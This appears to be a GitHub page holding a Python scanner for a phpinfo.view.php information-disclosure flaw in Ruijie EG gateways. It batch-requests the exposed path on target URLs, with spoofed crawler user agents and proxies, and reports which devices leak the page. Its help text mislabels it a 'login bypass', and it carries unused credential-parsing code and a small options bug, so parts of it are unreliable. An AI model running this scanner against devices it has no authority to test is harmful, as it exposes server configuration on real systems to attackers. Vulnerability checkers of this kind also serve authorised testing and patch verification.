-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy path锐捷EG易网关PHPINFO.VIEW.PHP 信息泄露漏洞.py
189 lines (151 loc) · 6.11 KB
/
锐捷EG易网关PHPINFO.VIEW.PHP 信息泄露漏洞.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
import argparse
import json
from user_agent import get_user_agent_pc
import requests
import os
import random
import string
requests.packages.urllib3.disable_warnings()
proxies = None
headers = {
"Content-Type": "application/x-www-form-urlencoded"
}
proxies = None
timeout = None
delay = None
thread = None
# 1 访问目标站点
def _get_request(url: str) -> (int, requests.Response or str):
try:
res = requests.get(url=url, timeout=timeout, headers=headers, proxies=proxies, verify=False)
return 200, res
except Exception as e:
return 500, f"[!]无法正常访问{url}"
# 2. 获取页面内容
def _get_content(o: requests.Response, encoding: str = "UTF-8") -> str:
_encoding = encoding if o.encoding is None or not o.encoding else o.encoding
return o.content.decode(_encoding)
def get_data_from_file(filename: str, mode: str) -> tuple:
if not os.path.isabs(filename):
filename = os.path.abspath(os.path.join(os.getcwd(), filename))
if not os.path.isfile(filename):
return "405", "{}不是一个合法文件".format(filename)
if not os.path.exists(filename):
return "404", "无法找到{}文件".format(filename)
try:
content = None
with open(filename, mode=mode) as f:
content = f.read().split()
return "200", content
except Exception as e:
return "500", "打开{}文件时发生意料之外的错误".format(filename)
def get_data_brute_list(url_dict: dict) -> dict:
brute_list = {
'url': None
}
for key, value in url_dict.items():
_type = value.get("type")
if _type is None or not _type:
continue
if _type == "file":
_value = value.get("value")
code, res = get_data_from_file(_value, mode="r")
if code != "200":
print(res)
continue
brute_list[key] = res
else:
brute_list[key] = [value.get('value', None), ]
return brute_list
def task(url_dict: dict):
global proxies, headers, timeout, delay, thread
brute_list = get_data_brute_list(url_dict)
urls = brute_list.get('url', None)
options = brute_list.get('options', None)[0]
proxy = options.get('proxy', None)
if proxy is None or not proxy:
proxy = None
else:
os.environ['http_proxy'] = proxy
proxies = {
'http': proxy
}
headers.setdefault("User-Agent", options.get('user_agent', None))
timeout = options.get('time_out', None)
delay = options.get('delay', None)
thread = options.get('thread', None)
attack_url = "/tool/view/phpinfo.view.php"
for url in urls:
url = url[:-1] if url.endswith("/") else url
code, res = _get_request(url + attack_url)
if code != 200:
continue
content = _get_content(res)
if content is None or not content:
continue
if 200 <= res.status_code < 400:
print(f"{url + attack_url} phpinfo 泄露存在!")
def prcess_json_data(content: str) -> (int, dict or str):
try:
data = json.loads(content)
user = data.get('data', None)
if user is None or not user:
return 404, "找不到账号密码相关数据"
res = user.split(" ")
return 200, {
"username": res[-2],
"password": res[-1]
}
except json.decoder.JSONDecodeError as l_e:
return 403, "解析文本失败,可能是内容类型发生错误"
except Exception as e:
return 500, "解析文本失败,,解析过程中出现异常"
def set_cmd_arg() -> any:
description = 'Ruijie RG-EW1200G login bypass'
parser = argparse.ArgumentParser(description=description, add_help=True)
targets = parser.add_mutually_exclusive_group(required=True)
targets.add_argument('-u', '--url', type=str, help='Enter target object')
targets.add_argument("-f", '--file', type=str, help='Input target object file')
parser.add_argument('--random-agent', type=bool,
required=False, help='Using random user agents')
parser.add_argument('--time-out', type=int,
required=False, help='Set the HTTP access timeout range (setting range from 0 to 5)')
parser.add_argument('-d', '--delay', type=int,
required=False, help='Set multi threaded access latency (setting range from 0 to 5)')
parser.add_argument('-t', '--thread', type=int,
required=False, help='Set the number of program threads (setting range from 1 to 50)')
parser.add_argument('--proxy', type=str,
required=False, help='Set up HTTP proxy')
args = parser.parse_args()
return args
def parse_cmd_args(args) -> dict:
o = dict()
if args.url is None or not args.url:
o.setdefault('url', {'type': 'file', 'value': args.file})
else:
o.setdefault('url', {'type': 'str', 'value': args.url})
options = dict()
if args.random_agent is not None and args.random_agent:
user_agent = get_user_agent_pc()
else:
user_agent = "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
options.setdefault('user_agent', user_agent)
time_out = 1
base_time_out = random.randint(1, 5)
if args.time_out is not None:
if args.time_out < 0 or args.time_out > 5:
time_out = 0
else:
time_out = args.time_out
options.setdefault('time_out', (base_time_out, base_time_out + time_out))
options.setdefault('delay', args.delay if args.delay is not None else 0)
options.setdefault('thread', args.delay if args.thread is not None else 0)
options.setdefault('proxy', args.proxy if args.proxy is not None else None)
o.setdefault('options', {"type": "str", "value": options})
return o
def main() -> None:
args = set_cmd_arg()
obj = parse_cmd_args(args)
task(obj)
if __name__ == '__main__':
main()